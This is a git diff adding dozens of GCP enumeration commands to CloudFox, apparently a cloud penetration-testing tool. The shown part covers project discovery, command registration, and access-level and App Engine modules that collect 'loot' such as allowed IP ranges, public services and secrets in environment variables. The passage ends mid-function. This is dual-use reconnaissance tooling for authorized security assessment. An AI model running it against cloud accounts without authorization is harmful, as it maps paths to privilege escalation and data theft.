diff --git a/.gitignore b/.gitignore index 9dac55a5..cd9cead3 100644 --- a/.gitignore +++ b/.gitignore @@ -62,8 +62,11 @@ terraform.rc .DS_Store untracked/* +*tmp* +tmp/* output/* *cloudfox-output* +cloudfox-* cloudfox *.log *.bak @@ -75,4 +78,4 @@ dist/ # graphvis files *.gv -*.svg \ No newline at end of file +*.svg diff --git a/README.md b/README.md index d9f5fd53..0c1a03a0 100644 --- a/README.md +++ b/README.md @@ -52,9 +52,9 @@ For the full documentation please refer to our [wiki](https://github.com/BishopF | Provider| CloudFox Commands | | - | - | -| AWS | 34 | -| Azure | 4 | -| GCP | 8 | +| AWS | 34 | +| Azure | 4 | +| GCP | 57 | | Kubernetes | Support Planned | @@ -159,22 +159,109 @@ Additional policy notes (as of 09/2022): # GCP Commands -| Provider | Command Name | Description + +## Identity & Access Management +| Provider | Command Name | Description | +| - | - | - | +| GCP | whoami | Display identity context for the authenticated GCP user/service account | +| GCP | iam | Enumerate GCP IAM principals across organizations, folders, and projects | +| GCP | permissions | Enumerate ALL permissions for each IAM entity with full inheritance explosion | +| GCP | serviceaccounts | Enumerate GCP service accounts with security analysis | +| GCP | service-agents | Enumerate Google-managed service agents | +| GCP | keys | Enumerate all GCP keys (SA keys, HMAC keys, API keys) | +| GCP | resource-iam | Enumerate IAM policies on GCP resources (buckets, datasets, secrets, etc.) 
| +| GCP | domain-wide-delegation | Find service accounts with Domain-Wide Delegation to Google Workspace | +| GCP | privesc | Identify privilege escalation paths in GCP projects | + +## Compute & Containers +| Provider | Command Name | Description | +| - | - | - | +| GCP | instances | Enumerate GCP Compute Engine instances with security configuration | +| GCP | gke | Enumerate GKE clusters with security analysis | +| GCP | cloudrun | Enumerate Cloud Run services and jobs with security analysis | +| GCP | functions | Enumerate GCP Cloud Functions with security analysis | +| GCP | app-engine | Enumerate App Engine applications and security configurations | +| GCP | composer | Enumerate Cloud Composer environments | +| GCP | dataproc | Enumerate Dataproc clusters | +| GCP | dataflow | Enumerate Dataflow jobs and pipelines | +| GCP | notebooks | Enumerate Vertex AI Workbench notebooks | +| GCP | workload-identity | Enumerate GKE Workload Identity and Workload Identity Federation | + +## Storage & Databases +| Provider | Command Name | Description | +| - | - | - | +| GCP | buckets | Enumerate GCP Cloud Storage buckets with security configuration | +| GCP | bucket-enum | Enumerate GCS buckets for sensitive files (credentials, secrets, configs) | +| GCP | bigquery | Enumerate GCP BigQuery datasets and tables with security analysis | +| GCP | cloudsql | Enumerate Cloud SQL instances with security analysis | +| GCP | spanner | Enumerate Cloud Spanner instances and databases | +| GCP | bigtable | Enumerate Cloud Bigtable instances and tables | +| GCP | filestore | Enumerate Filestore NFS instances | +| GCP | memorystore | Enumerate Memorystore (Redis) instances | + +## Networking +| Provider | Command Name | Description | +| - | - | - | +| GCP | vpc-networks | Enumerate VPC Networks | +| GCP | firewall | Enumerate VPC networks and firewall rules with security analysis | +| GCP | loadbalancers | Enumerate Load Balancers | +| GCP | dns | Enumerate Cloud DNS zones and records 
with security analysis | +| GCP | endpoints | Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames | +| GCP | private-service-connect | Enumerate Private Service Connect endpoints and service attachments | +| GCP | network-topology | Visualize VPC network topology, peering relationships, and trust boundaries | + +## Security & Compliance +| Provider | Command Name | Description | +| - | - | - | +| GCP | vpc-sc | Enumerate VPC Service Controls | +| GCP | access-levels | Enumerate Access Context Manager access levels | +| GCP | cloud-armor | Enumerate Cloud Armor security policies and find weaknesses | +| GCP | iap | Enumerate Identity-Aware Proxy configurations | +| GCP | beyondcorp | Enumerate BeyondCorp Enterprise configurations | +| GCP | kms | Enumerate Cloud KMS key rings and crypto keys with security analysis | +| GCP | secrets | Enumerate GCP Secret Manager secrets with security configuration | +| GCP | cert-manager | Enumerate SSL/TLS certificates and find expiring or misconfigured certs | +| GCP | org-policies | Enumerate organization policies and identify security weaknesses | + +## CI/CD & Source Control +| Provider | Command Name | Description | +| - | - | - | +| GCP | artifact-registry | Enumerate GCP Artifact Registry and Container Registry with security configuration | +| GCP | cloudbuild | Enumerate Cloud Build triggers and builds | +| GCP | source-repos | Enumerate Cloud Source Repositories | +| GCP | scheduler | Enumerate Cloud Scheduler jobs with security analysis | + +## Messaging & Events +| Provider | Command Name | Description | +| - | - | - | +| GCP | pubsub | Enumerate Pub/Sub topics and subscriptions with security analysis | + +## Logging & Monitoring +| Provider | Command Name | Description | +| - | - | - | +| GCP | logging | Enumerate Cloud Logging sinks and metrics with security analysis | +| GCP | logging-gaps | Find resources with missing or incomplete logging | + +## Organization & Projects +| 
Provider | Command Name | Description | +| - | - | - | +| GCP | organizations | Enumerate GCP organization hierarchy | +| GCP | asset-inventory | Enumerate Cloud Asset Inventory with optional dependency analysis | +| GCP | backup-inventory | Enumerate backup policies, protected resources, and identify backup gaps | +| GCP | cross-project | Analyze cross-project access patterns for lateral movement | + +## Attack Path Analysis +| Provider | Command Name | Description | | - | - | - | -| GCP | [whoami](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#whoami) | Display the email address of the GCP authenticated user | -| GCP | [all-checks](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#all-checks) | Runs all available GCP commands | -| GCP | [artifact-registry](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#artifact-registry) | Display GCP artifact registry information | -| GCP | [bigquery](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#bigquery) | Display Bigquery datasets and tables information | -| GCP | [buckets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#buckets) | Display GCP buckets information | -| GCP | [iam](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#iam) | Display GCP IAM information | -| GCP | [instances](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#instances) | Display GCP Compute Engine instances information | -| GCP | [secrets](https://github.com/BishopFox/cloudfox/wiki/GCP-Commands#secrets) | Display GCP secrets information | +| GCP | lateral-movement | Map lateral movement paths, credential theft vectors, and pivot opportunities | +| GCP | data-exfiltration | Identify data exfiltration paths and high-risk data exposure | # Authors * [Carlos Vendramini](https://github.com/carlosvendramini-bf) * [Seth Art (@sethsec](https://twitter.com/sethsec)) +* Joseph Barcia # Contributing [Wiki - How to Contribute](https://github.com/BishopFox/cloudfox/wiki#how-to-contribute) diff --git 
a/cli/gcp.go b/cli/gcp.go index e69efb6b..ede190ea 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -6,6 +6,7 @@ import ( "github.com/BishopFox/cloudfox/gcp/commands" oauthservice "github.com/BishopFox/cloudfox/gcp/services/oauthService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) @@ -16,6 +17,10 @@ var ( GCPProjectID string GCPProjectIDsFilePath string GCPProjectIDs []string + GCPAllProjects bool + + // Project name mapping (ProjectID -> DisplayName) + GCPProjectNames map[string]string // Output formatting options GCPOutputFormat string @@ -36,18 +41,45 @@ var ( Long: `See "Available Commands" for GCP Modules below`, Short: "See \"Available Commands\" for GCP Modules below", PersistentPreRun: func(cmd *cobra.Command, args []string) { - if GCPProjectID != "" { + // Initialize project names map + GCPProjectNames = make(map[string]string) + + // Handle project discovery based on flags + if GCPAllProjects { + // Discover all accessible projects + GCPLogger.InfoM("Discovering all accessible projects...", "gcp") + orgsSvc := orgsservice.New() + projects, err := orgsSvc.SearchProjects("") + if err != nil { + GCPLogger.FatalM(fmt.Sprintf("Failed to discover projects: %v. Try using -p or -l flags instead.", err), "gcp") + } + for _, proj := range projects { + if proj.State == "ACTIVE" { + GCPProjectIDs = append(GCPProjectIDs, proj.ProjectID) + GCPProjectNames[proj.ProjectID] = proj.DisplayName + } + } + if len(GCPProjectIDs) == 0 { + GCPLogger.FatalM("No accessible projects found. 
Check your permissions.", "gcp") + } + GCPLogger.InfoM(fmt.Sprintf("Discovered %d project(s)", len(GCPProjectIDs)), "gcp") + } else if GCPProjectID != "" { GCPProjectIDs = append(GCPProjectIDs, GCPProjectID) + // Resolve project name for single project + resolveProjectNames(GCPProjectIDs) } else if GCPProjectIDsFilePath != "" { GCPProjectIDs = internal.LoadFileLinesIntoArray(GCPProjectIDsFilePath) + // Resolve project names for all projects in list + resolveProjectNames(GCPProjectIDs) } else { - GCPLogger.InfoM("project or project-list flags not given, commands requiring a project ID will fail", "gcp") + GCPLogger.InfoM("project, project-list, or all-projects flag not given, commands requiring a project ID will fail", "gcp") } - // Create a context with this value to share it with subcommands at runtime + + // Create a context with project IDs and names ctx := context.WithValue(context.Background(), "projectIDs", GCPProjectIDs) + ctx = context.WithValue(ctx, "projectNames", GCPProjectNames) - // Set the context for this command which all subcommands can access via [SUBCMD].Parent().Context() - // cmd.SetContext(ctx) + // Authenticate and get account info os := oauthservice.NewOAuthService() principal, err := os.WhoAmI() if err != nil { @@ -59,6 +91,40 @@ var ( } ) +// resolveProjectNames fetches display names for given project IDs +func resolveProjectNames(projectIDs []string) { + if len(projectIDs) == 0 { + return + } + + orgsSvc := orgsservice.New() + // Fetch all accessible projects and build lookup map + projects, err := orgsSvc.SearchProjects("") + if err != nil { + // Non-fatal: we can continue without display names + GCPLogger.InfoM("Could not resolve project names, using project IDs only", "gcp") + for _, id := range projectIDs { + GCPProjectNames[id] = id // fallback to using ID as name + } + return + } + + // Build lookup from fetched projects + projectLookup := make(map[string]string) + for _, proj := range projects { + projectLookup[proj.ProjectID] = 
proj.DisplayName + } + + // Map our project IDs to names + for _, id := range projectIDs { + if name, ok := projectLookup[id]; ok { + GCPProjectNames[id] = name + } else { + GCPProjectNames[id] = id // fallback to using ID as name + } + } +} + // New RunAllGCPCommands function to execute all child commands var GCPAllChecksCommand = &cobra.Command{ Use: "all-checks", @@ -69,6 +135,9 @@ var GCPAllChecksCommand = &cobra.Command{ if childCmd == cmd { // Skip the run-all command itself to avoid infinite recursion continue } + if childCmd.Hidden { // Skip hidden commands + continue + } GCPLogger.InfoM(fmt.Sprintf("Running command: %s", childCmd.Use), "all-checks") childCmd.Run(cmd, args) @@ -86,7 +155,7 @@ func init() { // GCPCommands.PersistentFlags().StringVarP(&GCPOrganization, "organization", "o", "", "Organization name or number, repetable") GCPCommands.PersistentFlags().StringVarP(&GCPProjectID, "project", "p", "", "GCP project ID") GCPCommands.PersistentFlags().StringVarP(&GCPProjectIDsFilePath, "project-list", "l", "", "Path to a file containing a list of project IDs separated by newlines") - // GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Use all project IDs available to activated gloud account or given gcloud account") + GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Automatically discover and use all accessible projects") // GCPCommands.PersistentFlags().BoolVarP(&GCPConfirm, "yes", "y", false, "Non-interactive mode (like apt/yum)") // GCPCommands.PersistentFlags().StringVarP(&GCPOutputFormat, "output", "", "brief", "[\"brief\" | \"wide\" ]") GCPCommands.PersistentFlags().IntVarP(&Verbosity, "verbosity", "v", 2, "1 = Print control messages only\n2 = Print control messages, module output\n3 = Print control messages, module output, and loot file output\n") @@ -97,13 +166,85 @@ func init() { // Available commands GCPCommands.AddCommand( + // Core/existing commands 
commands.GCPBucketsCommand, commands.GCPArtifactRegistryCommand, commands.GCPBigQueryCommand, commands.GCPSecretsCommand, commands.GCPIAMCommand, + commands.GCPPermissionsCommand, + commands.GCPResourceIAMCommand, commands.GCPInstancesCommand, commands.GCPWhoAmICommand, + + // Compute/serverless commands + commands.GCPFunctionsCommand, + commands.GCPCloudRunCommand, + commands.GCPAppEngineCommand, + commands.GCPGKECommand, + commands.GCPCloudSQLCommand, + + // New infrastructure commands + commands.GCPPubSubCommand, + commands.GCPKMSCommand, + commands.GCPLoggingCommand, + commands.GCPSchedulerCommand, + commands.GCPDNSCommand, + commands.GCPFirewallCommand, + commands.GCPServiceAccountsCommand, + commands.GCPKeysCommand, + commands.GCPEndpointsCommand, + commands.GCPWorkloadIdentityCommand, + commands.GCPOrganizationsCommand, + commands.GCPCloudBuildCommand, + commands.GCPMemorystoreCommand, + commands.GCPFilestoreCommand, + commands.GCPSpannerCommand, + commands.GCPBigtableCommand, + + // Data processing commands + commands.GCPDataflowCommand, + commands.GCPComposerCommand, + + // Security/Compliance commands + commands.GCPVPCSCCommand, + commands.GCPAssetInventoryCommand, + commands.GCPSecurityCenterCommand, + commands.GCPComplianceDashboardCommand, + commands.GCPBackupInventoryCommand, + commands.GCPCostSecurityCommand, + commands.GCPMonitoringAlertsCommand, + + // Network/Infrastructure commands + commands.GCPLoadBalancersCommand, + commands.GCPVPCNetworksCommand, + commands.GCPNetworkTopologyCommand, + + // ML/Data Science commands + commands.GCPNotebooksCommand, + commands.GCPDataprocCommand, + + // Zero Trust/Access commands + commands.GCPIAPCommand, + commands.GCPBeyondCorpCommand, + commands.GCPAccessLevelsCommand, + + // Pentest/Exploitation commands + commands.GCPPrivescCommand, + commands.GCPOrgPoliciesCommand, + commands.GCPBucketEnumCommand, + commands.GCPCrossProjectCommand, + commands.GCPLoggingGapsCommand, + commands.GCPSourceReposCommand, + 
commands.GCPServiceAgentsCommand, + commands.GCPDomainWideDelegationCommand, + commands.GCPPrivateServiceConnectCommand, + commands.GCPCloudArmorCommand, + commands.GCPCertManagerCommand, + commands.GCPLateralMovementCommand, + commands.GCPDataExfiltrationCommand, + + // All checks (last) GCPAllChecksCommand, ) } diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go new file mode 100644 index 00000000..01e1bd91 --- /dev/null +++ b/gcp/commands/accesslevels.go @@ -0,0 +1,272 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + accesspolicyservice "github.com/BishopFox/cloudfox/gcp/services/accessPolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +var accessLevelOrgID string + +var GCPAccessLevelsCommand = &cobra.Command{ + Use: globals.GCP_ACCESSLEVELS_MODULE_NAME, + Aliases: []string{"access-levels", "conditional-access", "ca"}, + Short: "Enumerate Access Context Manager access levels", + Long: `Enumerate Access Context Manager access levels (conditional access policies). 
+ +Features: +- Lists all access levels in the organization +- Shows IP-based, device-based, and identity conditions +- Identifies overly permissive access levels +- Analyzes device policy requirements + +Organization Discovery: +- Automatically discovers organization from project ancestry if --org not specified +- Use --org to explicitly specify an organization ID`, + Run: runGCPAccessLevelsCommand, +} + +func init() { + GCPAccessLevelsCommand.Flags().StringVar(&accessLevelOrgID, "org", "", "Organization ID (required)") +} + +type AccessLevelsModule struct { + gcpinternal.BaseGCPModule + OrgID string + AccessLevels []accesspolicyservice.AccessLevelInfo + LootMap map[string]*internal.LootFile +} + +type AccessLevelsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AccessLevelsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AccessLevelsOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPAccessLevelsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ACCESSLEVELS_MODULE_NAME) + if err != nil { + return + } + + // Discover organizations if not specified + orgIDs := []string{} + if accessLevelOrgID != "" { + orgIDs = append(orgIDs, accessLevelOrgID) + } else { + // Auto-discover organizations from project ancestry + discoveredOrgs := discoverOrganizations(cmdCtx.Ctx, cmdCtx.ProjectIDs, cmdCtx.Logger) + if len(discoveredOrgs) == 0 { + cmdCtx.Logger.ErrorM("Could not discover any organizations. 
Use --org flag to specify one.", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + orgIDs = discoveredOrgs + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered %d organization(s) from project ancestry", len(orgIDs)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } + + // Run for each organization + for _, orgID := range orgIDs { + module := &AccessLevelsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: orgID, + AccessLevels: []accesspolicyservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) + } +} + +// discoverOrganizations finds organization IDs from project ancestry +func discoverOrganizations(ctx context.Context, projectIDs []string, logger internal.Logger) []string { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil + } + + orgMap := make(map[string]bool) + for _, projectID := range projectIDs { + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + continue + } + + for _, ancestor := range resp.Ancestor { + if ancestor.ResourceId.Type == "organization" { + orgMap[ancestor.ResourceId.Id] = true + } + } + } + + var orgs []string + for orgID := range orgMap { + orgs = append(orgs, orgID) + } + return orgs +} + +func (m *AccessLevelsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Enumerating access levels for organization: %s", m.OrgID), globals.GCP_ACCESSLEVELS_MODULE_NAME) + + svc := accesspolicyservice.New() + + levels, err := svc.ListAccessLevels(m.OrgID) + if err != nil { + // Use shared error handling + gcpinternal.HandleGCPError(err, logger, globals.GCP_ACCESSLEVELS_MODULE_NAME, + fmt.Sprintf("Could not list access levels for org %s", m.OrgID)) + return + } + + m.AccessLevels = levels + + if len(m.AccessLevels) == 0 { + logger.InfoM("No access levels found", 
globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + + for _, level := range m.AccessLevels { + m.addToLoot(level) + } + + logger.SuccessM(fmt.Sprintf("Found %d access level(s)", len(m.AccessLevels)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *AccessLevelsModule) initializeLootFiles() { + m.LootMap["access-levels-details"] = &internal.LootFile{ + Name: "access-levels-details", + Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n\n", + } + m.LootMap["access-levels-allowed-ips"] = &internal.LootFile{ + Name: "access-levels-allowed-ips", + Contents: "", + } +} + +func (m *AccessLevelsModule) addToLoot(level accesspolicyservice.AccessLevelInfo) { + m.LootMap["access-levels-details"].Contents += fmt.Sprintf( + "# Level: %s\n# Title: %s\n# Policy: %s\n# Combining: %s\n# Conditions: %d\n\n", + level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) + + for _, condition := range level.Conditions { + for _, ip := range condition.IPSubnetworks { + m.LootMap["access-levels-allowed-ips"].Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) + } + } +} + +func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Access Levels table + header := []string{"Name", "Title", "Policy", "Combining", "Conditions", "Device Policy"} + var body [][]string + for _, level := range m.AccessLevels { + hasDevicePolicy := "No" + for _, cond := range level.Conditions { + if cond.DevicePolicy != nil { + hasDevicePolicy = "Yes" + break + } + } + + combiningFunc := level.CombiningFunction + if combiningFunc == "" { + combiningFunc = "AND" + } + + body = append(body, []string{ + level.Name, + level.Title, + level.PolicyName, + combiningFunc, + fmt.Sprintf("%d", len(level.Conditions)), + hasDevicePolicy, + }) + } + tables = append(tables, internal.TableFile{ + Name: "access-levels", + Header: header, + Body: body, + }) + + // 
Conditions detail table + var condBody [][]string + for _, level := range m.AccessLevels { + for i, cond := range level.Conditions { + ipRanges := strings.Join(cond.IPSubnetworks, ", ") + if ipRanges == "" { + ipRanges = "(any)" + } + + members := strings.Join(cond.Members, ", ") + if members == "" { + members = "(any)" + } + + regions := strings.Join(cond.Regions, ", ") + if regions == "" { + regions = "(any)" + } + + deviceReqs := "(none)" + if cond.DevicePolicy != nil { + var reqs []string + if cond.DevicePolicy.RequireScreenLock { + reqs = append(reqs, "screen-lock") + } + if cond.DevicePolicy.RequireCorpOwned { + reqs = append(reqs, "corp-owned") + } + if cond.DevicePolicy.RequireAdminApproval { + reqs = append(reqs, "admin-approval") + } + if len(reqs) > 0 { + deviceReqs = strings.Join(reqs, ", ") + } + } + + condBody = append(condBody, []string{ + level.Name, + fmt.Sprintf("%d", i+1), + ipRanges, + members, + regions, + deviceReqs, + }) + } + } + + if len(condBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-level-conditions", + Header: []string{"Level", "Condition", "IP Ranges", "Members", "Regions", "Device Requirements"}, + Body: condBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := AccessLevelsOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } +} diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go new file mode 100644 index 00000000..959b040f --- /dev/null +++ b/gcp/commands/appengine.go @@ -0,0 +1,619 @@ +package commands + +import ( + "context" + "fmt" 
+ "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/appengine/v1" +) + +// Module name constant +const GCP_APPENGINE_MODULE_NAME string = "app-engine" + +var GCPAppEngineCommand = &cobra.Command{ + Use: GCP_APPENGINE_MODULE_NAME, + Aliases: []string{"appengine", "gae"}, + Short: "Enumerate App Engine applications and security configurations", + Long: `Analyze App Engine applications for security configurations and potential issues. + +Features: +- Lists all App Engine services and versions +- Identifies public services without authentication +- Analyzes ingress settings and firewall rules +- Detects environment variable secrets +- Reviews service account configurations +- Identifies deprecated runtimes +- Analyzes traffic splitting configurations`, + Run: runGCPAppEngineCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AppEngineApp struct { + ProjectID string + ID string + LocationID string + AuthDomain string + DefaultHostname string + ServingStatus string + DefaultBucket string + ServiceAccount string + DispatchRules int + FirewallRules int +} + +type AppEngineService struct { + ProjectID string + ID string + AppID string + Split map[string]float64 + DefaultURL string + VersionCount int + LatestVersion string +} + +type AppEngineVersion struct { + ProjectID string + ServiceID string + ID string + AppID string + Runtime string + Environment string + ServingStatus string + CreateTime string + InstanceClass string + Scaling string + Network string + VPCConnector string + IngressSettings string + EnvVarCount int + SecretEnvVars int + ServiceAccount string + URL string + DeprecatedRuntime bool + DefaultSA bool + Public bool +} + +type AppEngineFirewallRule struct { + ProjectID string + Priority int64 + Action string + SourceRange string + 
Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type AppEngineModule struct { + gcpinternal.BaseGCPModule + + Apps []AppEngineApp + Services []AppEngineService + Versions []AppEngineVersion + FirewallRules []AppEngineFirewallRule + LootMap map[string]*internal.LootFile + mu sync.Mutex + + totalApps int + totalServices int + publicCount int + secretsFound int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type AppEngineOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AppEngineOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AppEngineOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_APPENGINE_MODULE_NAME) + if err != nil { + return + } + + module := &AppEngineModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Apps: []AppEngineApp{}, + Services: []AppEngineService{}, + Versions: []AppEngineVersion{}, + FirewallRules: []AppEngineFirewallRule{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating App Engine applications...", GCP_APPENGINE_MODULE_NAME) + + aeService, err := appengine.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create App Engine service: %v", err), GCP_APPENGINE_MODULE_NAME) + return + } + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, 
project, aeService, logger) + }(projectID) + } + wg.Wait() + + if m.totalApps == 0 { + logger.InfoM("No App Engine applications found", GCP_APPENGINE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d App Engine app(s) with %d service(s) and %d version(s)", + m.totalApps, m.totalServices, len(m.Versions)), GCP_APPENGINE_MODULE_NAME) + + if m.publicCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d public service(s) without authentication", m.publicCount), GCP_APPENGINE_MODULE_NAME) + } + + if m.secretsFound > 0 { + logger.InfoM(fmt.Sprintf("Found %d potential secret(s) in environment variables", m.secretsFound), GCP_APPENGINE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *AppEngineModule) processProject(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating App Engine for project: %s", projectID), GCP_APPENGINE_MODULE_NAME) + } + + app, err := aeService.Apps.Get(projectID).Do() + if err != nil { + if !strings.Contains(err.Error(), "404") { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not get App Engine app in project %s", projectID)) + } + return + } + + m.mu.Lock() + m.totalApps++ + m.mu.Unlock() + + appRecord := AppEngineApp{ + ProjectID: projectID, + ID: app.Id, + LocationID: app.LocationId, + AuthDomain: app.AuthDomain, + DefaultHostname: app.DefaultHostname, + ServingStatus: app.ServingStatus, + DefaultBucket: app.DefaultBucket, + ServiceAccount: app.ServiceAccount, + } + + if app.DispatchRules != nil { + appRecord.DispatchRules = len(app.DispatchRules) + } + + m.mu.Lock() + m.Apps = append(m.Apps, appRecord) + m.mu.Unlock() + + m.enumerateServices(ctx, projectID, aeService, logger) + m.enumerateFirewallRules(ctx, projectID, 
aeService, logger) +} + +func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + services, err := aeService.Apps.Services.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine services in project %s", projectID)) + return + } + + for _, svc := range services.Services { + m.mu.Lock() + m.totalServices++ + m.mu.Unlock() + + serviceRecord := AppEngineService{ + ProjectID: projectID, + ID: svc.Id, + AppID: projectID, + } + + if svc.Split != nil { + serviceRecord.Split = svc.Split.Allocations + } + + m.mu.Lock() + m.Services = append(m.Services, serviceRecord) + m.mu.Unlock() + + ingressSettings := "all" + if svc.NetworkSettings != nil && svc.NetworkSettings.IngressTrafficAllowed != "" { + ingressSettings = svc.NetworkSettings.IngressTrafficAllowed + } + + m.enumerateVersions(ctx, projectID, svc.Id, ingressSettings, aeService, logger) + } +} + +func (m *AppEngineModule) enumerateVersions(ctx context.Context, projectID, serviceID, ingressSettings string, aeService *appengine.APIService, logger internal.Logger) { + versions, err := aeService.Apps.Services.Versions.List(projectID, serviceID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine versions for service %s", serviceID)) + return + } + + for _, ver := range versions.Versions { + versionRecord := AppEngineVersion{ + ProjectID: projectID, + ServiceID: serviceID, + ID: ver.Id, + AppID: projectID, + Runtime: ver.Runtime, + Environment: ver.Env, + ServingStatus: ver.ServingStatus, + CreateTime: ver.CreateTime, + IngressSettings: ingressSettings, + ServiceAccount: ver.ServiceAccount, + URL: ver.VersionUrl, + } + + if ver.InstanceClass != "" { + versionRecord.InstanceClass = ver.InstanceClass + } + 
+ if ver.Network != nil { + versionRecord.Network = ver.Network.Name + } + + if ver.VpcAccessConnector != nil { + versionRecord.VPCConnector = ver.VpcAccessConnector.Name + } + + // Scaling type + if ver.AutomaticScaling != nil { + versionRecord.Scaling = "automatic" + } else if ver.BasicScaling != nil { + versionRecord.Scaling = "basic" + } else if ver.ManualScaling != nil { + versionRecord.Scaling = "manual" + } + + // Check for deprecated runtime + versionRecord.DeprecatedRuntime = m.isDeprecatedRuntime(ver.Runtime) + + // Check environment variables for secrets + if ver.EnvVariables != nil { + versionRecord.EnvVarCount = len(ver.EnvVariables) + secretCount := m.analyzeEnvVars(ver.EnvVariables, serviceID, ver.Id, projectID) + versionRecord.SecretEnvVars = secretCount + } + + // Check ingress settings for public access + if versionRecord.IngressSettings == "all" || versionRecord.IngressSettings == "INGRESS_TRAFFIC_ALLOWED_ALL" { + versionRecord.Public = true + m.mu.Lock() + m.publicCount++ + m.mu.Unlock() + } + + // Check for default service account + if versionRecord.ServiceAccount == "" || strings.Contains(versionRecord.ServiceAccount, "@appspot.gserviceaccount.com") { + versionRecord.DefaultSA = true + } + + m.mu.Lock() + m.Versions = append(m.Versions, versionRecord) + m.mu.Unlock() + } +} + +func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + rules, err := aeService.Apps.Firewall.IngressRules.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + 